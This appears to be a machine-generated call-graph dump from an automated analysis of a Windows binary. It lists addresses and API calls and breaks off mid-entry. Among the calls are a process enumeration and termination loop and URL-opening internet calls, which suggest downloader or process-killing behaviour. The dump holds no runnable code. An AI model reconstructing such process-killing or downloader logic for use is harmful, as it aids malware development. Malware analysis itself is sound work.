VariantInit SysAllocString 42768->42717 42770 7ff6845774af 42768->42770 42769->42717 42769->42768 42771 7ff6845a2a38 std::_Facet_Register 50 API calls 42770->42771 42773 7ff6845774e0 42771->42773 42772->42699 42772->42703 42774 7ff6845774f0 SysAllocString 42773->42774 42775 7ff684577520 42773->42775 42774->42717 42774->42775 42775->42717 42776 7ff684577620 VariantClear VariantClear VariantClear 42775->42776 42779 7ff6845775f7 SysFreeString 42775->42779 42784 7ff684577600 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42775->42784 42777 7ff684577666 42776->42777 42778 7ff68457778e 42776->42778 42782 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42777->42782 42780 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42778->42780 42779->42784 42781 7ff6845777a5 42780->42781 42781->42717 42783 7ff6845777dd Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42781->42783 42785 7ff684577686 42782->42785 42787 7ff68457780c CoUninitialize 42783->42787 42784->42776 42785->42717 42786 7ff6845776be Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42785->42786 42788 7ff6845776df CoUninitialize 42786->42788 42787->42699 42787->42703 42788->42699 42788->42703 42790 7ff684565db1 42789->42790 42791 7ff684565e20 Process32FirstW 42789->42791 42793 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42790->42793 42792 7ff684565fe4 CloseHandle 42791->42792 42813 7ff684565e40 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42791->42813 44081 7ff6845639d0 42792->44081 42812 7ff684565ddc 42793->42812 42796 7ff684565e14 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42798 7ff6845a2770 codecvt 8 API calls 42796->42798 42797 7ff684584160 50 API calls 42797->42813 42802 7ff684566119 42798->42802 42799 7ff684566180 42800 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42799->42800 42803 7ff684566185 42800->42803 42801 7ff6845639d0 2 API calls 42810 7ff684566028 42801->42810 42802->42293 42804 7ff68456609f 42805 7ff6845660bb 42804->42805 42806 7ff68456613a 42804->42806 42807 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42805->42807 42811 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42806->42811 42807->42812 42808 7ff684565fce Process32NextW 42808->42792 42808->42813 42809 7ff684565f20 OpenProcess 42809->42808 42809->42813 42810->42804 42814 7ff684566084 Sleep 42810->42814 42811->42812 42812->42796 42812->42799 42813->42797 42813->42799 42813->42808 42813->42809 42816 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42813->42816 42817 7ff684565fb0 TerminateProcess CloseHandle 42813->42817 42818 7ff684565fab Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42813->42818 42815 7ff6845639d0 2 API calls 42814->42815 42815->42810 42816->42813 42817->42808 42818->42817 42820 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42819->42820 42821 7ff684567cba 42820->42821 44088 7ff68459e0b4 42821->44088 42828 7ff68456846f 44140 7ff684564dc0 54 API calls Concurrency::cancel_current_task 42828->44140 42830 7ff68459e0b4 __std_fs_code_page 48 API calls 42832 7ff684567d7f 42830->42832 42831 7ff684568485 42834 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42831->42834 42833 7ff684563ab0 52 API calls 42832->42833 42835 7ff684567d97 42833->42835 42838 7ff68456848b 42834->42838 42839 7ff6845655a0 66 API calls 42835->42839 42836 7ff6845683a5 44130 7ff684586670 10 API calls Concurrency::cancel_current_task 42836->44130 42837 7ff684567ea1 42841 7ff68459e0b4 __std_fs_code_page 48 API calls 42837->42841 42843 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42838->42843 42840 7ff684567db1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42839->42840 42840->42828 42840->42831 42840->42836 42840->42837 42840->42838 42847 7ff68456845e 42840->42847 42842 7ff684567ec0 42841->42842 42845 7ff684563ab0 52 API calls 42842->42845 42846 7ff684568491 42843->42846 42893 7ff684567ed9 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42845->42893 42850 7ff684564d50 54 API calls 42846->42850 44132 7ff684564d50 42847->44132 42848 7ff6845683d2 42852 7ff684581dc0 50 API calls 42848->42852 42851 7ff6845684a5 42850->42851 42853 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42851->42853 42862 7ff684568331 42852->42862 42855 7ff6845684ab 42853->42855 42854 7ff68456841c Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42856 7ff6845a2770 codecvt 8 API calls 42854->42856 42857 7ff684564d50 54 API calls 42855->42857 42859 7ff684568430 42856->42859 42860 7ff6845684bc 42857->42860 42858 7ff684568451 42861 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42858->42861 42859->42295 42865 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42860->42865 42863 7ff684568456 42861->42863 42862->42854 42862->42858 44131 7ff684564c60 53 API calls 3 library calls 42863->44131 42866 7ff6845684c2 42865->42866 42869 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42866->42869 42870 7ff6845684c8 42869->42870 42871 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42870->42871 42872 7ff6845684ce 42871->42872 42873 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42872->42873 42874 7ff6845684d4 CoInitialize CoCreateInstance 42873->42874 42877 7ff684568548 42874->42877 42894 7ff6845685ab Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42874->42894 42875 7ff684563f60 56 API calls 42875->42893 42878 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42877->42878 42905 7ff684568569 42878->42905 42880 7ff684581dc0 50 API calls 42880->42893 42881 7ff68456883a 42883 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42881->42883 42882 7ff6845a2770 codecvt 8 API calls 42884 7ff684568823 42882->42884 42885 7ff68456883f 42883->42885 42884->42295 42887 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42885->42887 42886 7ff684568845 42888 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42886->42888 42887->42886 42889 7ff68456884b 42888->42889 42891 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42889->42891 42890 7ff684584160 50 API calls 42890->42893 42892 7ff684568851 42891->42892 42892->42295 42893->42846 42893->42851 42893->42855 42893->42860 42893->42862 42893->42863 42893->42866 42893->42870 42893->42872 42893->42875 42893->42880 42893->42890 44114 7ff684564e20 42893->44114 44120 7ff684564f80 42893->44120 44128 7ff684586670 10 API calls Concurrency::cancel_current_task 42893->44128 44129 7ff684587d80 50 API calls 4 library calls 42893->44129 42894->42886 42894->42889 42895 7ff6845686a9 42894->42895 42896 7ff684568716 42894->42896 42898 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42895->42898 42900 7ff68456879a CoUninitialize 42896->42900 42901 7ff68456873a 42896->42901 42903 7ff6845686ce Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42898->42903 42899 7ff684568709 CoUninitialize 42899->42905 42900->42905 42902 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42901->42902 42902->42903 42903->42885 42903->42899 42904 7ff68456859f Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42904->42882 42905->42881 42905->42904 42907 7ff6845a2a38 std::_Facet_Register 50 API calls 42906->42907 42908 7ff68457d0fc 42907->42908 42908->42514 42910 7ff68456e7f5 42909->42910 42911 7ff684570e22 42909->42911 42913 7ff6845860e0 50 API calls 42910->42913 44312 7ff684562410 50 API calls std::_Throw_Cpp_error 42911->44312 42915 7ff68456e826 42913->42915 42914 7ff684570e28 42917 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42914->42917 42916 7ff6845808c0 std::_Throw_Cpp_error 50 API calls 42915->42916 42918 7ff68456e841 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42916->42918 42919 7ff684570e2e 42917->42919 42918->42914 42921 7ff68459e0b4 __std_fs_code_page 48 API calls 42918->42921 42920 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42919->42920 42922 7ff684570e34 42920->42922 42923 7ff68456e915 42921->42923 44313 7ff684564dc0 54 API calls Concurrency::cancel_current_task 42922->44313 42924 7ff684563ab0 52 API calls 42923->42924 42926 7ff68456e93d 42924->42926 42928 7ff6845655a0 66 API calls 42926->42928 42927 7ff684570e51 42929 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42927->42929 42931 7ff68456e95d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42928->42931 42930 7ff684570e57 42929->42930 42934 7ff684564d50 54 API calls 42930->42934 42931->42919 42931->42922 42932 7ff68456e9fd 42931->42932 42933 7ff68456eae9 42931->42933 42935 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 42932->42935 42936 7ff68459e0b4 __std_fs_code_page 48 API calls 42933->42936 42937 7ff684570e6e 42934->42937 42956 7ff68456ea32 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42935->42956 42938 7ff68456eb20 42936->42938 42940 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42937->42940 42939 7ff684563ab0 52 API calls 42938->42939 43026 7ff68456eb48 __std_exception_copy memcpy_s Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42939->43026 42942 7ff684570e74 42940->42942 42941 7ff68456eab4 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 42943 7ff6845a2770 codecvt 8 API calls 42941->42943 42944 7ff684564d50 54 API calls 42942->42944 42946 7ff68456eacc 42943->42946 42947 7ff684570e84 42944->42947 42945 7ff684570e1d 42948 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42945->42948 42946->42514 44314 7ff684562410 50 API calls std::_Throw_Cpp_error 42947->44314 42948->42911 42950 7ff684570e8a 44315 7ff684562410 50 API calls std::_Throw_Cpp_error 42950->44315 42952 7ff684570e90 44316 7ff684562410 50 API calls std::_Throw_Cpp_error 42952->44316 42954 7ff684570e96 42959 7ff684564d50 54 API calls 42954->42959 42955 7ff684570d51 42955->42956 43038 7ff6845887b0 48 API calls 42955->43038 42956->42927 42956->42941 42956->42945 42957 7ff684564f80 52 API calls 42957->43026 42958 7ff684563f60 56 API calls 42958->43026 42960 7ff684570ead 42959->42960 44317 7ff684564dc0 54 API calls Concurrency::cancel_current_task 42960->44317 42961 7ff684570fe7 44322 7ff684564c60 53 API calls 3 library calls 42961->44322 42964 7ff684570eca 42966 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42964->42966 42965 7ff684570fef 42967 7ff684570ecf 42966->42967 42968 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42967->42968 42970 7ff684570ed5 42968->42970 42969 7ff6845860e0 50 API calls 42969->43026 42972 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42970->42972 42971 7ff6845a2a38 50 API calls std::_Facet_Register 42971->43026 42974 7ff684570edb 42972->42974 42973 7ff6845806d0 50 API calls 42973->43026 44318 7ff6845a49c0 RtlPcToFileHeader RaiseException 42974->44318 42976 7ff684570f36 42977 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42976->42977 42978 7ff684570f3c 42977->42978 42979 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42978->42979 42980 7ff684570f42 42979->42980 42982 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42980->42982 42981 7ff684563ab0 52 API calls 42981->43026 42983 7ff684570f48 42982->42983 42986 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42983->42986 42984 7ff68459e440 66 API calls 42984->43026 42985 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 42985->43026 42987 7ff684570f4e 42986->42987 44319 7ff684564dc0 54 API calls Concurrency::cancel_current_task 42987->44319 42989 7ff6845655a0 66 API calls 42989->43026 42990 7ff684570f6b 42992 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42990->42992 42991 7ff68457fa80 116 API calls 42991->43026 42993 7ff684570f71 42992->42993 44320 7ff684564dc0 54 API calls Concurrency::cancel_current_task 42993->44320 42994 7ff684592ae0 70 API calls 42994->43026 42996 7ff684570f8e 42998 7ff684564d50 54 API calls 42996->42998 42999 7ff684570fa5 42998->42999 43000 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 42999->43000 43002 7ff684570fab 43000->43002 43001 7ff684565d00 47 API calls 43001->43026 43003 7ff684564d50 54 API calls 43002->43003 43004 7ff684570fbb 43003->43004 43006 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43004->43006 43005 7ff68459e0b4 48 API calls __std_fs_code_page 43005->43026 43009 7ff684570fc1 43006->43009 43007 7ff684570ff0 47 API calls 43007->43026 43012 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43009->43012 43011 7ff684599690 58 API calls 43011->43026 43013 7ff684570fc7 43012->43013 44321 7ff684564c60 53 API calls 3 library calls 43013->44321 43014 7ff684570fcf 43016 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43014->43016 43015 7ff684570fd5 43019 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43015->43019 43016->43015 43017 7ff684570fdb 43021 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43017->43021 43019->43017 43020 7ff684570fe1 43022 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43020->43022 43021->43020 43022->42961 43023 7ff684598e50 50 API calls 43023->43026 43025 7ff68457f4a0 50 API calls 43025->43026 43026->42930 43026->42937 43026->42942 43026->42947 43026->42950 43026->42952 43026->42954 43026->42955 43026->42957 43026->42958 43026->42960 43026->42961 43026->42964 43026->42967 43026->42969 43026->42970 43026->42971 43026->42973 43026->42974 43026->42976 43026->42978 43026->42980 43026->42981 43026->42983 43026->42984 43026->42985 43026->42987 43026->42989 43026->42990 43026->42991 43026->42993 43026->42994 43026->42996 43026->42999 43026->43001 43026->43002 43026->43004 43026->43005 43026->43007 43026->43009 43026->43011 43026->43013 43026->43014 43026->43015 43026->43017 43026->43020 43026->43023 43026->43025 43027 7ff684584160 50 API calls 43026->43027 43029 7ff684597af0 50 API calls 43026->43029 43031 7ff6845992e0 58 API calls 43026->43031 43032 7ff684597c70 58 API calls 43026->43032 43034 7ff684580370 47 API calls 43026->43034 43035 7ff684582ee0 50 API calls 43026->43035 43036 7ff68457e550 81 API calls 43026->43036 43037 7ff684597420 56 API calls 43026->43037 44266 7ff68457ffc0 43026->44266 44272 7ff6845887b0 43026->44272 44278 7ff684587870 43026->44278 44307 7ff68457f300 47 API calls 2 library calls 43026->44307 44308 7ff684598500 58 API calls codecvt 43026->44308 44309 7ff6845996c0 58 API calls 4 library calls 43026->44309 44310 7ff684587d80 50 API calls 4 library calls 43026->44310 44311 7ff684588a60 50 API calls std::_Throw_Cpp_error 43026->44311 43027->43026 43029->43026 43031->43026 43032->43026 43034->43026 43035->43026 43036->43026 43037->43026 43038->42956 43041 7ff684580922 43040->43041 43044 7ff6845808e3 codecvt 43040->43044 44422 7ff684584fa0 50 API calls 6 library calls 43041->44422 43043 7ff684580938 43043->42514 43044->42514 43046 7ff6845a2a38 std::_Facet_Register 50 API calls 43045->43046 43047 7ff68457ec3d 43046->43047 44423 7ff684588af0 43047->44423 43049 7ff68457ec63 43049->42514 43049->43049 43051 7ff6845a2a38 std::_Facet_Register 50 API calls 43050->43051 43052 7ff684571158 43051->43052 43053 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 43052->43053 43054 7ff684571199 43053->43054 43055 7ff68459e0b4 __std_fs_code_page 48 API calls 43054->43055 43056 7ff6845711b9 43055->43056 43057 7ff684563ab0 52 API calls 43056->43057 43058 7ff6845711d7 43057->43058 43059 7ff6845655a0 66 API calls 43058->43059 43062 7ff6845711ef Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43059->43062 43060 7ff6845720bf 44506 7ff684564dc0 54 API calls Concurrency::cancel_current_task 43060->44506 43063 7ff6845720d7 43062->43063 43064 7ff68459e0b4 __std_fs_code_page 48 API calls 43062->43064 43093 7ff6845712d1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43062->43093 43150 7ff6845713c1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow codecvt 43062->43150 43066 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43063->43066 43067 7ff684571293 43064->43067 43065 7ff68457218e 44513 7ff684564dc0 54 API calls Concurrency::cancel_current_task 43065->44513 43069 7ff6845720dd 43066->43069 43068 7ff684563ab0 52 API calls 43067->43068 43072 7ff6845712b1 43068->43072 44507 7ff684564dc0 54 API calls Concurrency::cancel_current_task 43069->44507 44435 7ff684565680 43072->44435 43073 7ff68457139d 44451 7ff6845805d0 50 API calls codecvt 43073->44451 43074 7ff6845721a7 44514 7ff684562410 50 API calls std::_Throw_Cpp_error 43074->44514 43076 7ff684572188 44512 7ff684562410 50 API calls std::_Throw_Cpp_error 43076->44512 43077 7ff684572128 43081 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43077->43081 43085 7ff68457212e 43081->43085 43082 7ff6845720f2 43090 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43082->43090 43084 7ff6845721ad 44515 7ff684562410 50 API calls std::_Throw_Cpp_error 43084->44515 44508 7ff684562370 50 API calls 2 library calls 43085->44508 43086 7ff68457217c 43089 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43086->43089 43087 7ff684583880 50 API calls 43087->43150 43088 7ff684572182 43097 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43088->43097 43089->43088 43095 7ff6845720f8 43090->43095 43091 7ff68457203b 43099 7ff68457206d Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43091->43099 43108 7ff6845720ba 43091->43108 43093->43069 43093->43082 44450 7ff684586540 50 API calls 5 library calls 43093->44450 43094 7ff684566190 121 API calls 43094->43150 43103 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43095->43103 43097->43076 43098 7ff6845a2a38 50 API calls std::_Facet_Register 43098->43150 43104 7ff684583ad0 47 API calls 43099->43104 43101 7ff6845720fe 43105 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43101->43105 43102 7ff684572134 43113 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43102->43113 43103->43101 43109 7ff68457208d 43104->43109 43107 7ff684572104 43105->43107 43106 7ff684572176 43112 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43106->43112 43120 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43107->43120 43115 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43108->43115 43114 7ff6845a2770 codecvt 8 API calls 43109->43114 43110 7ff6845844a0 std::_Throw_Cpp_error 50 API calls 43110->43150 43111 7ff684572170 44511 7ff684562410 50 API calls std::_Throw_Cpp_error 43111->44511 43112->43086 43118 7ff68457213a 43113->43118 43121 7ff68457209f 43114->43121 43115->43060 43117 7ff6845860e0 50 API calls 43117->43150 43124 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43118->43124 43123 7ff68457210a 43120->43123 43121->42514 43126 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43123->43126 43125 7ff684572140 43124->43125 44509 7ff684562370 50 API calls 2 library calls 43125->44509 43128 7ff684572110 43126->43128 43131 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43128->43131 43129 7ff684572146 43132 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43129->43132 43130 7ff684566970 177 API calls 43130->43150 43133 7ff684572116 43131->43133 43134 7ff68457214c 43132->43134 43135 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43133->43135 43136 7ff684564d50 54 API calls 43134->43136 43138 7ff68457211c 43135->43138 43140 7ff684572164 43136->43140 43137 7ff68457216a 43142 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43137->43142 43144 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43138->43144 44510 7ff684562410 50 API calls std::_Throw_Cpp_error 43140->44510 43141 7ff6845808c0 50 API calls std::_Throw_Cpp_error 43141->43150 43142->43111 43145 7ff684572122 43144->43145 43147 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43145->43147 43147->43077 43148 7ff68459e0b4 48 API calls __std_fs_code_page 43148->43150 43149 7ff684563ab0 52 API calls 43149->43150 43150->43060 43150->43065 43150->43074 43150->43076 43150->43077 43150->43084 43150->43085 43150->43086 43150->43087 43150->43088 43150->43091 43150->43094 43150->43095 43150->43098 43150->43101 43150->43102 43150->43106 43150->43107 43150->43110 43150->43111 43150->43117 43150->43118 43150->43123 43150->43125 43150->43128 43150->43129 43150->43130 43150->43133 43150->43134 43150->43137 43150->43138 43150->43140 43150->43141 43150->43145 43150->43148 43150->43149 43152 7ff6845655a0 66 API calls 43150->43152 44452 7ff684586540 50 API calls 5 library calls 43150->44452 44453 7ff6845805d0 50 API calls codecvt 43150->44453 44454 7ff6845806d0 43150->44454 44471 7ff684568880 118 API calls 5 library calls 43150->44471 44472 7ff68459e7c8 43150->44472 43152->43150 43154 7ff684583aeb 43153->43154 43155 7ff684583b26 43153->43155 44534 7ff684587d20 47 API calls Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43154->44534 43158 7ff684583060 47 API calls 43157->43158 43159 7ff684571008 43158->43159 43160 7ff684583060 47 API calls 43159->43160 43161 7ff684571014 43160->43161 43162 7ff684580370 47 API calls 43161->43162 43163 7ff68457101d 43162->43163 43164 7ff684580370 47 API calls 43163->43164 43165 7ff684571026 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43164->43165 43166 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43165->43166 43167 7ff68457109f Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43165->43167 43168 7ff6845710c5 43166->43168 43167->42514 43170 7ff684584286 43169->43170 43173 7ff684584186 43169->43173 44536 7ff684562410 50 API calls std::_Throw_Cpp_error 43170->44536 43174 7ff6845841ea 43173->43174 43175 7ff68458423e 43173->43175 43180 7ff684584191 codecvt 43173->43180 43182 7ff684584280 43173->43182 43178 7ff6845a2a38 std::_Facet_Register 50 API calls 43174->43178 43174->43182 43177 7ff6845a2a38 std::_Facet_Register 50 API calls 43175->43177 43177->43180 43179 7ff6845841ff 43178->43179 43179->43180 43181 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43179->43181 43180->42327 43181->43182 44535 7ff684562370 50 API calls 2 library calls 43182->44535 43184 7ff6845661ae std::_Locinfo::_Locinfo_ctor 43183->43184 43185 7ff6845662f7 43184->43185 43186 7ff6845661f2 43184->43186 43190 7ff6845806d0 50 API calls 43185->43190 43199 7ff68456624c Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43185->43199 43187 7ff684566756 43186->43187 43189 7ff6845860e0 50 API calls 43186->43189 44548 7ff684562410 50 API calls std::_Throw_Cpp_error 43187->44548 43194 7ff684566234 43189->43194 43190->43199 43191 7ff6845860e0 50 API calls 43198 7ff684566360 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43191->43198 43193 7ff68456675c 43196 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43193->43196 43195 7ff6845808c0 std::_Throw_Cpp_error 50 API calls 43194->43195 43195->43199 43197 7ff684566762 43196->43197 43202 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43197->43202 43200 7ff684566768 43198->43200 43201 7ff6845860e0 50 API calls 43198->43201 43230 7ff684566750 43198->43230 43199->43191 43199->43193 43199->43197 43199->43230 43203 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43200->43203 43209 7ff6845663e1 Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43201->43209 43202->43200 43204 7ff68456676e 43203->43204 43205 7ff68456641d InternetOpenA 43206 7ff684566442 43205->43206 43207 7ff6845664b1 InternetOpenUrlA 43205->43207 43209->43200 43209->43205 44547 7ff684562410 50 API calls std::_Throw_Cpp_error 43230->44547 45004 7ff68456a810 43409->45004 43886->42514 43887->42514 43888->42514 43889->42514 43894 7ff68457f50e 43890->43894 43891 7ff68457f5ed 45404 7ff684562410 50 API calls std::_Throw_Cpp_error 43891->45404 43894->43891 43895 7ff68457f52a codecvt 43894->43895 43896 7ff68457f55a 43894->43896 43897 7ff68457f5b2 43894->43897 43895->42514 43898 7ff6845a2a38 std::_Facet_Register 50 API calls 43896->43898 43899 7ff68457f5e7 43896->43899 43900 7ff6845a2a38 std::_Facet_Register 50 API calls 43897->43900 43901 7ff68457f570 43898->43901 45403 7ff684562370 50 API calls 2 library calls 43899->45403 43900->43895 43901->43895 43903 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43901->43903 43903->43899 43904->42514 43905->42514 43906->42514 43908 7ff684580381 43907->43908 43910 7ff68458038a Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43907->43910 45405 7ff6845846a0 47 API calls 2 library calls 43908->45405 43910->42514 43917->42310 43924 7ff68457797c K32EnumProcesses 43923->43924 43924->42561 43924->42572 43929 7ff684581de8 43925->43929 43927 7ff684581e34 43947 7ff684581160 43927->43947 43931 7ff684585b90 43929->43931 43930 7ff684581e3c 43930->42564 43932 7ff684585bc1 43931->43932 43933 7ff684585bd6 43932->43933 43934 7ff684581160 10 API calls 43932->43934 43936 7ff684585ca8 43933->43936 43938 7ff684585cdd 43933->43938 43934->43933 43935 7ff684585cb9 43935->43927 43936->43935 43962 7ff6845812c0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 43936->43962 43963 7ff6845a49c0 RtlPcToFileHeader RaiseException 43938->43963 43940 7ff684585d30 43941 7ff6845862f3 43940->43941 43942 7ff68458652f 43940->43942 43964 7ff684580e30 43941->43964 43977 7ff68459eec4 50 API calls 2 library calls 43942->43977 43946 7ff68458632a std::_Locinfo::_Locinfo_ctor 43946->43927 43948 7ff68458119e 43947->43948 43954 7ff684581220 43947->43954 43979 7ff68457f970 10 API calls 43948->43979 43950 7ff6845a2770 codecvt 8 API calls 43952 7ff68458124e 43950->43952 43951 7ff6845811ab 43953 7ff68458120d 43951->43953 43956 7ff684581263 43951->43956 43952->43930 43953->43954 43980 7ff6845812c0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 43953->43980 43954->43950 43981 7ff6845a49c0 RtlPcToFileHeader RaiseException 43956->43981 43958 7ff684581309 43958->43930 43959 7ff6845812b6 43959->43958 43982 7ff6845a49c0 RtlPcToFileHeader RaiseException 43959->43982 43961 7ff684581360 43962->43935 43963->43940 43965 7ff684580e5c 43964->43965 43966 7ff684580efb Concurrency::details::ContextBase::CancellationBeaconStack::Grow 43964->43966 43967 7ff684580f62 43965->43967 43969 7ff684580e81 43965->43969 43970 7ff684580eb7 43965->43970 43971 7ff684580e8e 43965->43971 43966->43946 43978 7ff684562370 50 API calls 2 library calls 43967->43978 43969->43966 43974 7ff6845acd30 _invalid_parameter_noinfo_noreturn 47 API calls 43969->43974 43972 7ff6845a2a38 std::_Facet_Register 50 API calls 43970->43972 43971->43967 43973 7ff684580e9b 43971->43973 43972->43969 43975 7ff6845a2a38 std::_Facet_Register 50 API calls 43973->43975 43976 7ff684580f6d 43974->43976 43975->43969 43978->43969 43979->43951 43980->43954 43981->43959 43982->43961 43983->42584 43984->42588 43985->42593 43986->42598 43988 7ff68459eae4 std::_Lockit::_Lockit 6 API calls 43987->43988 43989 7ff684587310 43988->43989 43990 7ff68459eae4 std::_Lockit::_Lockit 6 API calls 43989->43990 43994 7ff68458735f 43989->43994 43991 7ff684587335 43990->43991 43995 7ff68459eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43991->43995 43992 7ff68459eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43993 7ff6845873f0 43992->43993 43996 7ff6845a2770 codecvt 8 API calls 43993->43996 43997 7ff6845873ac 43994->43997 44016 7ff684563130 87 API calls 7 library calls 43994->44016 43995->43994 43998 7ff6845822d3 43996->43998 43997->43992 44006 7ff684585710 43998->44006 44000 7ff6845873be 44001 7ff6845873c4 44000->44001 44002 7ff684587413 44000->44002 44017 7ff68459f08c 50 API calls std::_Facet_Register 44001->44017 44018 7ff684562bf0 50 API calls 2 library calls 44002->44018 44005 7ff684587418 44007 7ff684585741 44006->44007 44008 7ff684581160 10 API calls 44007->44008 44009 7ff684585756 44007->44009 44008->44009 44010 7ff68458582f 44009->44010 44013 7ff684585864 44009->44013 44011 7ff684582313 44010->44011 44019 7ff6845812c0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 44010->44019 44011->42605 44020 7ff6845a49c0 RtlPcToFileHeader RaiseException 44013->44020 44015 7ff6845858b7 44016->44000 44017->43997 44018->44005 44019->44011 44020->44015 44021->42613 44022->42608 44064 7ff68457ee10 44023->44064 44026 7ff68457ee10 50 API calls 44027 7ff6845829ef 44026->44027 44028 7ff68457ee10 50 API calls 44027->44028 44029 7ff6845829fd 44028->44029 44030 7ff68457ee10 50 API calls 44029->44030 44031 7ff684582a0b 44030->44031 44032 7ff68457ec10 50 API calls 44031->44032 44033 7ff684582a19 44032->44033 44034 7ff68457ee10 50 API calls 44033->44034 44035 7ff684582a27 44034->44035 44036 7ff68457ee10 50 API calls 44035->44036 44037 7ff684582a47 44036->44037 44038 7ff68457f4e0 std::_Throw_Cpp_error 50 API calls 44037->44038 44039 7ff684582a5b 44038->44039 44040 7ff68457ee10 50 API calls 44039->44040 44041 7ff684582a84 44040->44041 44042 7ff68457ee10 50 API 